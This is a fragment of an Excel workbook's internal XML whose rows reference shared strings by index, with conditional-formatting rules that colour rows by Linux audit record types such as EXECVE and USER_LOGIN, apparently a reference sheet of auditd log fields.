    <row r="1990" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1990" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B1990" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="C1990" s="2" t="s">
        <v>914</v>
      </c>
      <c r="D1990" s="1" t="s">
        <v>914</v>
      </c>
    </row>
    <row r="1991" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A1991" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1991" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="C1991" s="2" t="s">
        <v>1195</v>
      </c>
      <c r="D1991" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E1991" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="F1991" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G1991" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H1991" s="1" t="s">
        <v>3186</v>
      </c>
      <c r="I1991" s="1" t="s">
        <v>3187</v>
      </c>
      <c r="J1991" s="1" t="s">
        <v>2719</v>
      </c>
      <c r="K1991" s="1" t="s">
        <v>1588</v>
      </c>
      <c r="L1991" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="M1991" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="N1991" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="O1991" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P1991" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q1991" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R1991" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S1991" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T1991" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U1991" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V1991" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W1991" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X1991" s="1" t="s">
        <v>2135</v>
      </c>
      <c r="Y1991" s="1" t="s">
        <v>1568</v>
      </c>
      <c r="Z1991" s="1" t="s">
        <v>3189</v>
      </c>
      <c r="AA1991" s="1" t="s">
        <v>3190</v>
      </c>
      <c r="AB1991" s="1" t="s">
        <v>1531</v>
      </c>
    </row>
    <row r="1992" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1992" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B1992" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="C1992" s="2" t="s">
        <v>1196</v>
      </c>
      <c r="D1992" s="1" t="s">
        <v>1532</v>
      </c>
      <c r="E1992" s="1" t="s">
        <v>3191</v>
      </c>
      <c r="F1992" s="1" t="s">
        <v>3192</v>
      </c>
      <c r="G1992" s="1" t="s">
        <v>3193</v>
      </c>
    </row>
    <row r="1993" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1993" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B1993" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="C1993" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="D1993" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E1993" s="1" t="s">
        <v>3194</v>
      </c>
      <c r="F1993" s="1" t="s">
        <v>3195</v>
      </c>
      <c r="G1993" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="H1993" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="I1993" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="J1993" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="K1993" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="L1993" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="M1993" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="N1993" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="1994" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1994" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B1994" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="C1994" s="2" t="s">
        <v>1212</v>
      </c>
      <c r="D1994" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="E1994" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="F1994" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="G1994" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H1994" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I1994" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="J1994" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="K1994" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="L1994" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="M1994" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="1995" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1995" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B1995" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="C1995" s="2" t="s">
        <v>1197</v>
      </c>
      <c r="D1995" s="1" t="s">
        <v>1197</v>
      </c>
    </row>
    <row r="1996" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A1996" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1996" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="C1996" s="2" t="s">
        <v>1199</v>
      </c>
      <c r="D1996" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E1996" s="1" t="s">
        <v>3196</v>
      </c>
      <c r="F1996" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G1996" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H1996" s="1" t="s">
        <v>1539</v>
      </c>
      <c r="I1996" s="1" t="s">
        <v>3197</v>
      </c>
      <c r="J1996" s="1" t="s">
        <v>3198</v>
      </c>
      <c r="K1996" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="L1996" s="1" t="s">
        <v>1543</v>
      </c>
      <c r="M1996" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="N1996" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="O1996" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P1996" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q1996" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R1996" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S1996" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T1996" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U1996" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V1996" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W1996" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X1996" s="1" t="s">
        <v>2135</v>
      </c>
      <c r="Y1996" s="1" t="s">
        <v>1568</v>
      </c>
      <c r="Z1996" s="1" t="s">
        <v>3189</v>
      </c>
      <c r="AA1996" s="1" t="s">
        <v>3190</v>
      </c>
      <c r="AB1996" s="1" t="s">
        <v>2092</v>
      </c>
    </row>
    <row r="1997" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1997" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B1997" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="C1997" s="2" t="s">
        <v>1448</v>
      </c>
      <c r="D1997" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E1997" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="F1997" s="1" t="s">
        <v>3200</v>
      </c>
      <c r="G1997" s="1" t="s">
        <v>2476</v>
      </c>
      <c r="H1997" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="I1997" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="J1997" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="K1997" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="L1997" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="M1997" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="N1997" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="1998" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1998" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B1998" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="C1998" s="2" t="s">
        <v>1197</v>
      </c>
      <c r="D1998" s="1" t="s">
        <v>1197</v>
      </c>
    </row>
    <row r="1999" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A1999" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1999" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C1999" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="D1999" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E1999" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="F1999" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G1999" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H1999" s="1" t="s">
        <v>3201</v>
      </c>
      <c r="I1999" s="1" t="s">
        <v>3202</v>
      </c>
      <c r="J1999" s="1" t="s">
        <v>2174</v>
      </c>
      <c r="K1999" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="L1999" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="M1999" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="N1999" s="1" t="s">
        <v>3203</v>
      </c>
      <c r="O1999" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P1999" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q1999" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R1999" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S1999" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T1999" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U1999" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V1999" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W1999" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X1999" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="Y1999" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="Z1999" s="1" t="s">
        <v>3204</v>
      </c>
      <c r="AA1999" s="1" t="s">
        <v>3205</v>
      </c>
      <c r="AB1999" s="1" t="s">
        <v>3206</v>
      </c>
    </row>
    <row r="2000" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2000" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B2000" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C2000" s="2" t="s">
        <v>1202</v>
      </c>
      <c r="D2000" s="1" t="s">
        <v>1532</v>
      </c>
      <c r="E2000" s="1" t="s">
        <v>3207</v>
      </c>
      <c r="F2000" s="1" t="s">
        <v>3208</v>
      </c>
      <c r="G2000" s="1" t="s">
        <v>3209</v>
      </c>
    </row>
    <row r="2001" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2001" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B2001" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C2001" s="2" t="s">
        <v>1449</v>
      </c>
      <c r="D2001" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E2001" s="1" t="s">
        <v>3210</v>
      </c>
      <c r="F2001" s="1" t="s">
        <v>3211</v>
      </c>
      <c r="G2001" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="H2001" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="I2001" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="J2001" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="K2001" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="L2001" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="M2001" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="N2001" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="2002" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2002" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B2002" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C2002" s="2" t="s">
        <v>1212</v>
      </c>
      <c r="D2002" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="E2002" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="F2002" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="G2002" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H2002" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I2002" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="J2002" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="K2002" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="L2002" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="M2002" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="2003" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2003" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B2003" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C2003" s="2" t="s">
        <v>1203</v>
      </c>
      <c r="D2003" s="1" t="s">
        <v>1203</v>
      </c>
    </row>
    <row r="2004" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A2004" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B2004" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C2004" s="2" t="s">
        <v>1205</v>
      </c>
      <c r="D2004" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E2004" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="F2004" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G2004" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H2004" s="1" t="s">
        <v>3212</v>
      </c>
      <c r="I2004" s="1" t="s">
        <v>3213</v>
      </c>
      <c r="J2004" s="1" t="s">
        <v>2174</v>
      </c>
      <c r="K2004" s="1" t="s">
        <v>2175</v>
      </c>
      <c r="L2004" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="M2004" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="N2004" s="1" t="s">
        <v>3214</v>
      </c>
      <c r="O2004" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P2004" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q2004" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R2004" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S2004" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T2004" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U2004" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V2004" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W2004" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X2004" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="Y2004" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="Z2004" s="1" t="s">
        <v>2917</v>
      </c>
      <c r="AA2004" s="1" t="s">
        <v>2918</v>
      </c>
      <c r="AB2004" s="1" t="s">
        <v>1531</v>
      </c>
    </row>
    <row r="2005" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2005" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B2005" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C2005" s="2" t="s">
        <v>879</v>
      </c>
      <c r="D2005" s="1" t="s">
        <v>1632</v>
      </c>
      <c r="E2005" s="1" t="s">
        <v>2919</v>
      </c>
      <c r="F2005" s="1" t="s">
        <v>2920</v>
      </c>
    </row>
    <row r="2006" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2006" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B2006" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C2006" s="2" t="s">
        <v>1333</v>
      </c>
      <c r="D2006" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E2006" s="1" t="s">
        <v>2921</v>
      </c>
      <c r="F2006" s="1" t="s">
        <v>2922</v>
      </c>
      <c r="G2006" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="H2006" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="I2006" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="J2006" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="K2006" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="L2006" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="M2006" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="N2006" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="2007" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2007" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B2007" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C2007" s="2" t="s">
        <v>1212</v>
      </c>
      <c r="D2007" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="E2007" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="F2007" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="G2007" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H2007" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I2007" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="J2007" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="K2007" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="L2007" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="M2007" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="2008" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2008" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B2008" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C2008" s="2" t="s">
        <v>880</v>
      </c>
      <c r="D2008" s="1" t="s">
        <v>880</v>
      </c>
    </row>
    <row r="2009" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2009" s="2" t="s">
        <v>1206</v>
      </c>
      <c r="B2009" s="2" t="s">
        <v>1207</v>
      </c>
      <c r="C2009" s="2" t="s">
        <v>1208</v>
      </c>
      <c r="D2009" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="E2009" s="1" t="s">
        <v>2127</v>
      </c>
      <c r="F2009" s="1" t="s">
        <v>2128</v>
      </c>
      <c r="G2009" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="H2009" s="1" t="s">
        <v>3215</v>
      </c>
      <c r="I2009" s="1" t="s">
        <v>3216</v>
      </c>
      <c r="J2009" s="1" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="2010" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A2010" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B2010" s="2" t="s">
        <v>1209</v>
      </c>
      <c r="C2010" s="2" t="s">
        <v>1210</v>
      </c>
      <c r="D2010" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E2010" s="1" t="s">
        <v>2087</v>
      </c>
      <c r="F2010" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G2010" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H2010" s="1" t="s">
        <v>3217</v>
      </c>
      <c r="I2010" s="1" t="s">
        <v>2568</v>
      </c>
      <c r="J2010" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="K2010" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="L2010" s="1" t="s">
        <v>1543</v>
      </c>
      <c r="M2010" s="1" t="s">
        <v>3218</v>
      </c>
      <c r="N2010" s="1" t="s">
        <v>3219</v>
      </c>
      <c r="O2010" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P2010" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q2010" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R2010" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S2010" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T2010" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U2010" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V2010" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W2010" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X2010" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="Y2010" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="Z2010" s="1" t="s">
        <v>2136</v>
      </c>
      <c r="AA2010" s="1" t="s">
        <v>2137</v>
      </c>
      <c r="AB2010" s="1" t="s">
        <v>2092</v>
      </c>
    </row>
    <row r="2011" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A2011" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B2011" s="2" t="s">
        <v>1209</v>
      </c>
      <c r="C2011" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="D2011" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E2011" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="F2011" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="G2011" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H2011" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I2011" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="J2011" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="K2011" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="L2011" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="M2011" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A1:C1048576">
    <cfRule type="expression" dxfId="17" priority="20">
      <formula>$A1="type=ANOM_ABEND"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="16" priority="21">
      <formula>$A1="type=CRED_ACQ"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="15" priority="22">
      <formula>$A1="type=CRED_DISP"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="14" priority="23">
      <formula>$A1="type=CRED_REFR"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="13" priority="24">
      <formula>$A1="type=EXECVE"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="12" priority="25">
      <formula>$A1="type=LOGIN"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="11" priority="26">
      <formula>$A1="type=PATH"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="10" priority="27">
      <formula>$A1="type=PROCTITLE"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="9" priority="28">
      <formula>$A1="type=SERVICE_START"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="8" priority="29">
      <formula>$A1="type=SERVICE_STOP"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="7" priority="30">
      <formula>$A1="type=SYSCALL"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="6" priority="31">
      <formula>$A1="type=USER_ACCT"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="5" priority="32">
      <formula>$A1="type=USER_AUTH"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="4" priority="33">
      <formula>$A1="type=USER_CMD"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="3" priority="34">
      <formula>$A1="type=USER_END"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="2" priority="35">
      <formula>$A1="type=USER_LOGIN"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="1" priority="36">
      <formula>$A1="type=USER_ROLE_CHANGE"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="0" priority="37">
      <formula>$A1="type=USER_START"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15D1-911B-4144-8298-0671CAD9C70F}">
  <sheetPr codeName="Sheet2"/>
  <dimension ref="A1:A18"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C3" sqref="C3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="26.77734375" customWidth="1"/>
    <col min="2" max="2" width="8.88671875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A1" s="2" t="s">
        <v>1206</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>494</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A9" s="2" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A10" s="2" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="13" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>480</v>
      </c>
    </row>
    <row r="15" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>491</v>
      </c>
    </row>
    <row r="16" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A16" s="2" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="17" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A17" s="2" t="s">
        <v>626</v>
      </c>
    </row>
    <row r="18" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A18" s="2" t="s">
        <v>311</v>
      </c>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A1:A2010">
    <sortCondition ref="A1:A201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720E-4799-49A1-85D6-221B1D5B6607}">
  <dimension ref="A1:A3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t="s">
        <v>3223</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A2" s="3" t="s">
        <v>3224</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.3">
      <c r="A3" s="3" t="s">
        <v>3225</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A2" r:id="rId1" xr:uid="{BAD6825C-0096-4829-9AEB-E8F273FA385D}"/>
    <hyperlink ref="A3" r:id="rId2" xr:uid="{F66A11CF-CE73-409C-9DF8-2CA140D395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REF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XyZen</dc:creator>
  <cp:lastModifiedBy>XyZen</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-05T09:28:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-14T18:17:21Z</dcterms:modified>
</cp:coreProperties>
</file>